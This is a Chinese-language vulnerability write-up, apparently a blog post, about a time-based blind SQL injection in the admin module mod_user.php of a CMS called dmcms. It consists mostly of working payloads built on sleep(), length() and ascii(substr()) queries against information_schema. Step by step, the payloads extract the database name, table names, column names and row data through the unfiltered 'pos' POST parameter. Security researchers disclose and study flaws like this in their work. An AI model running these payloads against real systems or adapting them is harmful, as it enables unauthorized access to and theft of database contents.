官网下载最新的安装包2019.3.13
具体文件安装后admindm-yourname\mod_account\mod_user.php
既http://域名/admindm-yourname\mod_account\mod_user.php
代码分析
登录后在添加管理处,存在修改pos参数,通过post传递值,无任何过滤,无回显,可进行时间盲注
在bp中添加‘and sleep(5) --+证明注入
因为数据库用户数为2所以时间为11s。这里需指定用户id,可点击管理员修改得到任一用户ID
既bp中k=1 ‘ where id =107 and sleep(5) --+
插入数据库代码
注入存在,开始注数据
猜数据库长度
k=1’ where id =107 and if(length(database())=5,sleep(5),1)–+
截取数据库第一个字符
and If(ascii(substr(database(),1,1))=100,sleep(10),1)–+
对于dtcms第一个d,acsii码为100.修改为substr(database(),2,1即可第二位,不在演示,最终得到库名为dtcms(建库时输错,本cms为dmcms)
爆dtcms库第一个表长度,and If(length((select table_name from information_schema.tables where table_schema=‘dtcms’ limit 0,1))=9,sleep(5),1)–+得到长度为9,将limit 0,1换为1,1既第二个表,不在演示
爆第一个表名第一位
If(ascii(substr((select table_name from information_schema.tables where table_schema=‘dtcms’ limit 0,1),1,1))=122,sleep(5),1)–+
这样得到第一个表第一个字符,将1,1改为2,1既第二个字符,以此将第一个表明查询出为zzz_album
爆zzz_album表的第一个列名长度and If(length((select column_name from information_schema.columns where table_schema='dtcms‘ and table_name=‘zzz_album’ limit 0,1))=8,sleep(10),1)–+
得到第一列列名长度为2
猜第一列列名and If(ascii(substr((select column_name from information_schema.columns where table_schema=‘dtcms’ and table_name=‘zzz_album’ limit 0,1),1,1))=105,sleep(5),1)–+
得到第一位为i,同上第二位为d。
猜Id列第一个数据的长度
If(length((select id from dtcms. zzz_album limit 0,1))=3,sleep(5),1)–+
长度为3
猜id列第一个数据一个字符
and If(ascii(substr((select id from dtcms. zzz_album limit 0,1),1,1))=49,sleep(5),1)—
猜出第一个为1,依次猜出为7,7
得到数据id第一列第一个数据为177
重复以上方法可全部注出